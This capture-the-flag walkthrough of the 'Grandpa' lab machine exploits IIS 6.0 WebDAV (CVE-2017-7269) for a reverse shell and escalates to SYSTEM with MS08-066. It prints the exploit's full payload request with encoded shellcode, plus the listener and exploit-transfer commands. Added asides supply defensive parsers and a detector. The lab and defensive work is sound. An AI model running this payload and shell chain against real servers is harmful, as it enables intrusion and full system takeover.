The first step was an Nmap scan with version detection, default scripts and OS detection against TCP ports 1-2056 (-sV -sC -O -p1-2056) to discover services running on the machine:
# Nmap 7.80 scan initiated Thu Nov 12 14:33:08 2020 as: nmap -sV -sC -O -p1-2056 -oN scan 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).
Not shown: 2055 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Thu, 12 Nov 2020 19:36:15 GMT
|_ Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2003 SP2 (88%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP (86%), Microsoft Windows Server 2003 SP1 - SP2 (85%), Microsoft Windows XP SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 12 14:33:28 2020 -- 1 IP address (1 host up) scanned in 19.20 seconds
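The triage a reader does by eye on the scan above (which server, which WebDAV methods are actually allowed versus merely advertised, and whether that combination points at a known bug) can be written down. The following is an added example, not part of the original writeup: a small Python parser for nmap's normal (-oN) output with the scan above embedded verbatim so it runs offline. The rule that maps "IIS 6.0 with PROPFIND allowed" to CVE-2017-7269 (the ScStoragePathFromUrl overflow, Exploit-DB 41738) is my own assumption encoded in the code, and the write-method list is my choice of what counts as state-changing.

```python
import re

# Normal-format (-oN) output from the scan above, embedded verbatim so the parser runs offline.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Thu, 12 Nov 2020 19:36:15 GMT
|_ Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
"""

# "80/tcp open http Microsoft IIS httpd 6.0" -> port, proto, state, service, free-text version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# WebDAV methods that change server state (my selection; COPY creates a resource at Destination).
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "MKCOL", "PROPPATCH", "COPY"}


def parse_nmap_normal(text):
    """Return {port: record} from -oN output, keeping the NSE fields this triage needs.

    Script output lines start with '|'; the first non-'|' line ends the current port block."""
    services = {}
    current = None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = int(m.group(1))
            services[current] = {
                "proto": m.group(2), "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(),
                "server_header": None,
                "risky_methods": [],
                "public_options": [],
                "allowed_methods": [],
            }
            continue
        if current is None:
            continue
        if not line.startswith("|"):
            current = None
            continue
        body = line.lstrip("|_ ").strip()
        key, _, value = body.partition(":")
        value = value.strip()
        rec = services[current]
        if key == "http-server-header":
            rec["server_header"] = value
        elif key == "Potentially risky methods":
            rec["risky_methods"] = value.split()
        elif key == "Public Options":
            rec["public_options"] = [v.strip() for v in value.split(",") if v.strip()]
        elif key == "Allowed Methods":
            rec["allowed_methods"] = [v.strip() for v in value.split(",") if v.strip()]
    return services


def assess_webdav(info):
    """Findings for one HTTP service record. The CVE is named only when version and method set both match."""
    findings = []
    header = info.get("server_header") or ""
    iis6 = "IIS/6.0" in header or "IIS httpd 6.0" in info.get("version", "")
    if iis6:
        findings.append("IIS 6.0 (ships with Windows Server 2003, out of support)")
    allowed = set(info["allowed_methods"])
    public = set(info["public_options"])
    if iis6 and "PROPFIND" in allowed:
        findings.append("WebDAV PROPFIND allowed on IIS 6.0: CVE-2017-7269 (ScStoragePathFromUrl) candidate")
    allowed_writes = WRITE_METHODS & allowed
    if allowed_writes:
        findings.append("write methods allowed on /: " + ", ".join(sorted(allowed_writes)))
    advertised_only = (WRITE_METHODS & public) - allowed
    if advertised_only:
        findings.append("write methods advertised in Public but not allowed on /: "
                        + ", ".join(sorted(advertised_only)) + "; they may still be allowed on other paths")
    return findings


if __name__ == "__main__":
    for port, rec in parse_nmap_normal(NMAP_OUTPUT).items():
        print(f"{port}/{rec['proto']} {rec['service']} {rec['version']}")
        for finding in assess_webdav(rec):
            print("  -", finding)
```

The distinction the parser preserves matters in practice: http-webdav-scan's "Public Options" is what the server says it supports in general, while "Allowed Methods" is what it accepts on the probed URI. Here PUT, DELETE, MOVE and MKCOL are only advertised, so an upload attempt against / would fail even though the method list looks promising.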
From the output we can see that IIS 6.0 is running with WebDAV enabled: the http-webdav-scan script lists PROPFIND, COPY, SEARCH, LOCK and UNLOCK among the allowed methods, and IIS 6.0 shipped with Windows Server 2003, which the OS detection also points at. I then used searchsploit to search for exploits for IIS 6.0:
┌──(root💀kali)-[/home/kali]
└─# searchsploit iis 6.0
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
After trying several of the exploits searchsploit listed, the one that worked was the WebDAV ScStoragePathFromUrl remote buffer overflow (windows/remote/41738.py, CVE-2017-7269).
I started a netcat listener on port 2600, downloaded the Python 2 script and ran it with the arguments it expects: target IP and port, then the IP and port of the listener. The first attempt timed out while connecting to the target; the second went through, and the script printed the PROPFIND request it sends, whose If header carries the oversized, non-ASCII payload that triggers the overflow.
root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
Traceback (most recent call last):
File "test.py", line 124, in <module>
sock.connect((targetip,targetport))
File "/usr/lib/python2.7/socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 110] Connection timed out
root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa₩ᄑᄄᄀᆪンᄀトᄈ₩ᄂᄊ¦ンᄇᄄᄍ¦ᆳᄋ¦ᄑᄚユモᄅマ¦ᄀᄄ¥ルᆪ₩ᄉヤ₩ᄀナ ̄ᆬモ¥チᆲ¥ユᄃ₩ンᆪ ̄ヘᄂ¦リᄚᄀナ₩ᆬメ¥ミᄆ¦ᄆリ₩ᄅムノチ¦ネᄆタᄉ¥ᄀミ ̄ルᄂ₩ᄆヌ ̄ヤᄍ¥ムᆰ¥タᄡ¥ムテンメ¥チᄀ ̄ネᄇ₩ᄉヒ₩ᄚᄡ ̄ノヌ₩ノチ ̄ンヘ¥ナᄀ¥ᄀᄁ¦ンᄈ¥ノミ ̄ルᄚユト₩ᄀᆰ ̄ヘᄡ¦ᄍハᄀᆱ¦ᆬᄊ¦ᄍᄈ¦ᄆᆰ¥ンᄎ₩ᄑᄆ¥ᄀハ ̄ネᄚ ̄ンᆴ¦ᆳノ¥ノヘ¦ᄀᆪ₩ᄑフユヨユᄉ₩ルᆵルᄄ¦ムヘ¥チᄚᄄᄊ₩ノヒ₩ユラユミ₩ᄅᄇᄅᆱンᄁルリ₩ノネ₩ヤᄆ ̄チヤ₩ᄆᄍ¥チハ¥ムᄁ¥タᄈ ̄ユᄋ₩ᄅᄋ¦ナト ̄フᄡ₩ムᄊ¦ᄉニ¥ルヤ¦ンᆲ₩ユテリᄇノᄌ¥ンᄅ¦フᄌ₩ノᄇ¥ᄄᄚ¥ᄂᄌ¥ムネツツ£ヒタ₩ᅠテ₩ᄆト¥ノヨ¦ᆲᄋ₩ᄆᆳ¦ᄑリ¥ᄀレᆬミ¦ᆬᆰ¥ᄀマ¦ᄅメ¦ナミ₩ルヘ£マタ₩ᅠテ¦ᅠᄡ₩ヤᄆ₩ᄑテ₩ᄍᆭムチ¦ヘᆲ£マタ₩ᅠテ¥ヘテ₩ᄅチチメ ̄フᄚ¥ᄀᆭ¦ノフチヒ₩ヘニ¥ナᄈᆬチᄅミ¦ᄅᆲ> (Not <locktoken:write1>) <http://localhost/bbbbbbbᆬネ₩ナᄉ¦ᄑテ₩ᄑᄃ₩ᆳᆵ¦ᄀナ ̄ルニ₩ンᄉ¦ミᄈ ̄ᄀᄆ¥ンᆬ¥ᄅᄁ¥ミᄉ¥ルᄀ₩ᆬメ₩ᄅモ¥ナラ ̄ᄀホ¥ᆬネ₩ヘユ¦ᆬᄆ¦ヘᄂ₩ムᄇ ̄ムᄄ¦ンリナᄍ ̄ヘᆱ₩ᆳユ₩ᄉネ¥チマᄅニ ̄ムᄆ₩ᄑヤムテ¥ᆬヨ₩ᄑᆵヘチ ̄ムラ₩ナᄄᄅᄇ ̄ンナ¦ᄉノ¥ンホ¥ムネ¦ᄚᄌ ̄ルᄎ ̄ユᄇ₩ノᆭ₩ᄍテ¦ᄀᆳ ̄ユネ₩ナᄋ¦ᄉレ₩ナᄡ¦トᄈ¦ヘᆬ¥ノᄇ₩ᄉᄅ ̄ルᄆ¦ᄍᄂ₩ᄌᄍ₩ヘモ₩ᆳᄂ¥ナニ¦ᄐᄚᄀᆵノモ₩ンミ¦ユモᄅᆪトᄍ¦ᄑモ¦ムヨ₩ᄐᄊヘᄍ₩ᄀᄋᄅヨ₩ナハ ̄ᆬナ ̄リᄍ₩ᄚᄍ¦ヤᄆ ̄ムᄇ¥ヘᆬ¥ᄀハ¦ムホᄅト₩ᄚᄉ¥ᄅヨ₩ノチ₩ᄍᄇ₩リᄆ¥ᆬル¥ミᄈ ̄ナツ¥ᄀᆬ¥ᆬチナミ ̄タᄊ¥ンᄋ¦ムラ¥ヘᄀ£マタ₩ᅠテ₩ᄍマ₩ᅠタ₩ᄍマ₩ᅠタ¦ノヌルᆰ£マタ₩ᅠテ¦ノラ¦ᄑᄡ¥ᆬヌ¥ネᄡ¦ᆳᆭ¦ᆳツムᄂᄀᆵ₩ツツ₩ᅠチ¥トᄉノᄎムᄎ¦ᄉヌ¦ムル¥ンラ→トモ₩ᅠタ ̄ナᄊ₩ᄍᆵ¬モᆪ₩ᅠチ£ムᅠ₩ᅠテᄒ£マタ₩ᅠテᆴ₩ᅠテナᆴムᄚ£ミᄡ₩ᅠテ¬ᄃᄃ₩ᅠチ←ホム₩ᅠタ ̄ᄂᄆ₩ルᆴ¦ᆬユ ̄チメ¥ムᆱルᆱノハᆬᄀ£ミワ₩ᅠテ₩ᄌナ₩ᅠタワᄇᆬᄄ¦ᄉᄅ ̄ルᆲ¦ムᄄ¦ᄉᄚ│ノニ₩ᅠタ¦ᄀᄋ ̄ノモ£ᄊᆰ₩ᅠツ₩ᄑᆰ¦フᄉ£マᄌ₩ᅠテ¬ᄃᄃ₩ᅠチVVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600
listening on [any] 2600 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
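The request the exploit printed above is also what a defender has to work with: a PROPFIND whose If header is thousands of bytes long and full of non-ASCII bytes, where RFC 4918 says an If header holds URIs and lock tokens, which are short and ASCII. IIS 6.0's W3C logs record the method and URI but not the If header, so this check has to run on captured traffic or in a proxy that sees request headers. The following is an added example, not code from the writeup or from the exploit: a minimal raw-HTTP parser plus the detection rule, run over two constructed requests. The suspicious sample copies only the shape of the exploit's request (two resource tags stuffed with multibyte filler); the filler bytes are arbitrary and are not a payload, and the 512-byte threshold is my assumption.

```python
IF_HEADER_LIMIT = 512  # bytes; an assumed threshold, tune to what your WebDAV clients really send


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body).

    Header names are lower-cased bytes; repeated headers are kept as a list."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    parts = request_line.split(b" ")
    if len(parts) < 3:
        raise ValueError("malformed request line")
    method, target = parts[0].decode("ascii", "replace"), parts[1]
    headers = {}
    for ln in header_lines:
        name, sep, value = ln.partition(b":")
        if not sep:
            continue
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target, headers, body


def inspect_if_header(raw):
    """Return the reasons a request looks like a WebDAV If-header overflow attempt; empty list if clean."""
    method, target, headers, _ = parse_request(raw)
    reasons = []
    for value in headers.get(b"if", []):
        if len(value) > IF_HEADER_LIMIT:
            reasons.append(f"{method} {target.decode('ascii', 'replace')}: If header is "
                           f"{len(value)} bytes (limit {IF_HEADER_LIMIT})")
        bad = [b for b in value if b > 0x7E or (b < 0x20 and b != 0x09)]
        if bad:
            reasons.append(f"{method}: If header carries {len(bad)} non-ASCII/control bytes; "
                           "RFC 4918 If values are URIs and lock tokens")
    return reasons


# Constructed samples (not captured traffic). BENIGN is a normal PROPFIND on a locked resource with a
# placeholder lock token; SUSPICIOUS imitates the layout of the exploit's request with arbitrary filler.
BENIGN = (
    b"PROPFIND /docs/report.docx HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Depth: 0\r\n"
    b"If: <http://localhost/docs/report.docx> (<opaquelocktoken:00000000-0000-0000-0000-000000000001>)\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

FILLER = "\u20a9\u3145\u3144".encode("utf-8") * 200  # 1800 bytes of arbitrary multibyte filler
SUSPICIOUS = (
    b"PROPFIND / HTTP/1.1\r\n"
    + b"Host: localhost\r\n"
    + b"Content-Length: 0\r\n"
    + b"If: <http://localhost/aaaaaaa" + FILLER + b"> (Not <locktoken:write1>) <http://localhost/bbbbbbb" + FILLER + b">\r\n"
    + b"\r\n"
)


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        hits = inspect_if_header(sample)
        print(name, "->", "clean" if not hits else "; ".join(hits))
```

Both conditions fire independently on purpose: a long but ASCII If header might be a client bug, and a short header with a few stray bytes might be a broken encoder, but the combination seen above has no legitimate explanation on an IIS 6.0 WebDAV endpoint.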
As you can see from the output, the shell was caught by the netcat listener and landed in c:\windows\system32\inetsrv, the IIS directory. I then moved on to privilege escalation. I ran systeminfo to get some details of the Grandpa machine; the output showed Windows Server 2003 with only one hotfix installed, which agrees with the version banner above (5.2.3790). Because of this I decided to try the MS08-066 exploit, a local privilege escalation in the Ancillary Function Driver (afd.sys) affecting Windows XP and Server 2003, as I had luck with it in the past. I downloaded the compiled exploit from GitHub and copied it to the machine over SMB into C:\wmpub, a directory the low-privileged shell could write to.
C:\wmpub>copy \\10.10.14.18\testshare\ms08066.exe
copy \\10.10.14.18\testshare\ms08066.exe
1 file(s) copied.
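The reasoning in the previous step (Server 2003, one hotfix, therefore try a known kernel bug) is what tools such as Windows Exploit Suggester automate. As an added example that is not part of the original writeup, here is that check in Python: parse systeminfo output, collect the installed KB/Q numbers and report which candidate bulletins have no matching fix. The systeminfo text is constructed to look like a Server 2003 host with a single hotfix (the writeup describes but does not reproduce its own output; host name and hotfix id are placeholders), and the bulletin-to-KB table is mine: MS08-066 is the one the page used, the other two are well-known Server 2003 kernel bulletins added for illustration.

```python
import re

# Constructed systeminfo output shaped like a Windows Server 2003 host with one hotfix. Not the page's output.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN2003-LAB
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
"""

# Local privilege-escalation bulletins for Windows Server 2003 and the KB that closes each.
# Mapping from Microsoft's bulletin numbering; the writeup itself only mentions MS08-066.
CANDIDATES = [
    {"bulletin": "MS08-066", "kb": "KB956803",
     "note": "afd.sys (Ancillary Function Driver) elevation of privilege; Windows XP and Server 2003"},
    {"bulletin": "MS10-015", "kb": "KB977165",
     "note": "KiTrap0D; 32-bit kernels only"},
    {"bulletin": "MS14-070", "kb": "KB2989935",
     "note": "tcpip.sys elevation of privilege; Server 2003"},
]

FIELD = re.compile(r"^([A-Za-z][A-Za-z0-9 ()/]*?):\s*(.*)$")      # "OS Version:   5.2.3790 ..."
HOTFIX = re.compile(r"\[\d+\]:\s*((?:KB|Q)\d+)", re.IGNORECASE)   # "[01]: KB956803" / "[01]: Q147222"


def parse_systeminfo(text):
    """Return the top-level fields as {name: value} plus a 'hotfixes' set of upper-cased KB/Q ids."""
    info = {"hotfixes": set()}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            info[m.group(1).strip()] = m.group(2).strip()
        h = HOTFIX.search(line)
        if h:
            info["hotfixes"].add(h.group(1).upper())
    return info


def is_server_2003(info):
    return "Server 2003" in info.get("OS Name", "") or info.get("OS Version", "").startswith("5.2.")


def suggest_missing(info):
    """Candidates whose KB is absent from the hotfix list. Absence means 'worth trying', not 'exploitable':
    systeminfo's list (WMI Win32_QuickFixEngineering) can be incomplete, and later rollups can supersede a KB."""
    if not is_server_2003(info):
        return []
    return [c for c in CANDIDATES if c["kb"] not in info["hotfixes"]]


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info.get("OS Name"), "|", info.get("OS Version"), "| hotfixes:", sorted(info["hotfixes"]))
    for c in suggest_missing(info):
        print(f"  {c['bulletin']} ({c['kb']} not installed): {c['note']}")
```

The docstring caveat is the important part: the exploit output above says "Kernel is \WINDOWS\system32\ntkrnlpa.exe", a 32-bit PAE kernel, and a suggestion list like this still has to be checked against architecture and service pack before a kernel exploit is run on a host that will blue-screen if the offsets are wrong.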
I then ran the exploit.
C:\wmpub>ms08066.exe
ms08066.exe
MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit
Create by SoBeIt.
Kernel is \WINDOWS\system32\ntkrnlpa.exe
Kernel base address: 80800000
Major Version:5 Minor Version:2
Load Base:410000
HalDispatchTable Offset:8088e078
NtQueryIntervalProfile function entry address:8088e07c
Exploit finished.
C:\wmpub>cd c:\
cd c:\
C:\>cd documents and settings
cd documents and settings
C:\Documents and Settings>cd Harry
cd Harry
C:\Documents and Settings\Harry>cd Desktop
cd Desktop
C:\Documents and Settings\Harry\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Harry\Desktop
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:32 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,123,960,320 bytes free
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
[REDACTED]
C:\Documents and Settings\Harry\Desktop>cd ..
cd ..
C:\Documents and Settings\Harry>cd ..
cd ..
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]
As you can see from the output, I was able to successfully browse to the Administrator and Harry folders as the SYSTEM user and capture both flags.